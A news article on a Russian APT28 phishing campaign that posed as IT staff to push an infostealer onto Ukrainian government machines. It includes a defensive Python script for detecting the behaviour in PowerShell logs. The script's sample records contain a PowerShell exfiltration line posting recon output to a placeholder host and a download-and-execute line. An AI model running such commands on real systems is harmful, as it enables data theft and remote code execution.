Russian cybercriminals have been spotted targeting Ukrainian government employees with information-stealing malware by posing as IT staff working in those organizations.
Cybersecurity researchers from the Computer Emergency Response Team of Ukraine (CERT-UA) observed the hacking campaign, in which Russian state-sponsored hackers from the APT28 threat actor (also known as Fancy Bear) have been sending emails to Ukrainian government employees.
These emails claimed to be from the government's IT department and urged recipients to update their Windows devices immediately in order to prevent possible cyberattacks.
Posing as Ukrainians
The researchers couldn't say how the attackers obtained this information, but to improve their credibility, the hackers would create @outlook.com email addresses using the names of real people working in these organizations.
If any victims took the bait, the attackers would instruct them to run a PowerShell command which, instead of updating the machine, downloaded information-stealing malware.
This malware abuses the "tasklist" and "systeminfo" commands to harvest sensitive data and send it to a Mocky service API via an HTTP request.
To make sure no one falls for the trick, CERT-UA recommends that real IT departments restrict the ability to run PowerShell commands on critical devices and monitor network traffic for suspicious activity, especially anything connecting to the Mocky service API.
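The monitoring advice above can be turned into a simple detection over PowerShell script-block logs. The following is an added example written for this article, not code from CERT-UA or from the campaign's malware: it scans constructed sample log records (the field names, hosts, users and scripts are all made up for the example) and flags script blocks that combine host reconnaissance commands ("tasklist", "systeminfo") with an outbound HTTP call, or that contact a watched host. The host name "mock-api.example" is a placeholder standing in for whatever endpoint the Mocky service API resolves to in a real deployment, which this article does not state.

```python
import json
import re

# Constructed sample records in the shape of PowerShell script-block logging
# (Event ID 4104). These are NOT real telemetry; the field names are assumptions.
SAMPLE_EVENTS = [
    {"id": 1, "host": "ws-01", "user": "a.ivanenko",
     "script": "Get-ChildItem C:\\Users\\a.ivanenko\\Documents"},
    {"id": 2, "host": "ws-02", "user": "o.kovalenko",
     "script": "$r = tasklist; $s = systeminfo; "
               "Invoke-RestMethod -Uri 'https://mock-api.example/collect' -Method Post -Body ($r + $s)"},
    {"id": 3, "host": "ws-03", "user": "admin",
     "script": "systeminfo | Out-File C:\\temp\\inventory.txt"},
    {"id": 4, "host": "ws-04", "user": "svc-backup",
     "script": "(New-Object Net.WebClient).DownloadString('https://updates.example/patch.ps1') | iex"},
]

# Reconnaissance commands named in the CERT-UA description of the malware.
RECON_CMDS = re.compile(r"\b(tasklist|systeminfo)\b", re.IGNORECASE)
# Common ways a PowerShell one-liner talks to the network (cmdlets, aliases, .NET).
HTTP_CALLS = re.compile(
    r"\b(Invoke-WebRequest|Invoke-RestMethod|iwr|irm|curl|wget|Net\.WebClient|DownloadString|DownloadFile)\b",
    re.IGNORECASE,
)
URL_RE = re.compile(r"https?://[^\s'\"()]+", re.IGNORECASE)
EXEC_RE = re.compile(r"\b(iex|Invoke-Expression)\b", re.IGNORECASE)


def classify(event, watch_hosts=()):
    """Return (severity, reason) for one script-block record, or None if nothing stands out."""
    script = event["script"]
    recon = sorted({m.group(1).lower() for m in RECON_CMDS.finditer(script)})
    http = HTTP_CALLS.search(script) is not None
    urls = URL_RE.findall(script)
    watched = [u for u in urls if any(h.lower() in u.lower() for h in watch_hosts)]

    # Highest confidence: the exact combination the campaign used, host recon
    # plus an outbound HTTP request inside the same script block.
    if recon and http:
        return "high", f"recon commands {recon} plus outbound HTTP in one block"
    # Any contact with a host on the watch list (e.g. the mock-API endpoint).
    if watched:
        return "high", f"contact with watched host(s): {watched}"
    # Download-and-execute: web call piped into Invoke-Expression.
    if http and EXEC_RE.search(script):
        return "medium", "download-and-execute pattern (web call piped to Invoke-Expression)"
    # Recon on its own is common admin activity; record it at low severity.
    if recon:
        return "low", f"recon commands {recon} without network activity"
    return None


def scan(events, watch_hosts=()):
    """Run classify() over a list of records and return the findings in input order."""
    findings = []
    for ev in events:
        result = classify(ev, watch_hosts)
        if result:
            severity, reason = result
            findings.append({"id": ev["id"], "host": ev["host"], "user": ev["user"],
                             "severity": severity, "reason": reason})
    return findings


if __name__ == "__main__":
    # Placeholder watch-list host; replace with the real endpoint observed in your environment.
    for finding in scan(SAMPLE_EVENTS, watch_hosts=("mock-api.example",)):
        print(json.dumps(finding))
```

On the sample records this flags event 2 (recon plus HTTP) as high, event 4 (download-and-execute) as medium, and event 3 (systeminfo alone) as low, while the plain directory listing in event 1 produces nothing. The same logic can be fed from exported 4104 events instead of the inline samples; the point is that the combination of reconnaissance and network activity in a single block is what separates this campaign's payload from ordinary admin scripting.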
The Russo-Ukrainian war, which has been raging for more than a year now, is being fought on two fronts: one physical, and one in cyberspace. Russian hackers have been hard at work trying to infect government endpoints with malware, as well as trying to bring down key government and media websites.
In fact, almost two-thirds (60%) of all phishing emails that targeted Ukrainian targets in the first quarter of the year came from Russian threat actors, Google's Threat Analysis Group (TAG) says. TAG also claims APT28 is one of the key players in this campaign.
Via: BleepingComputer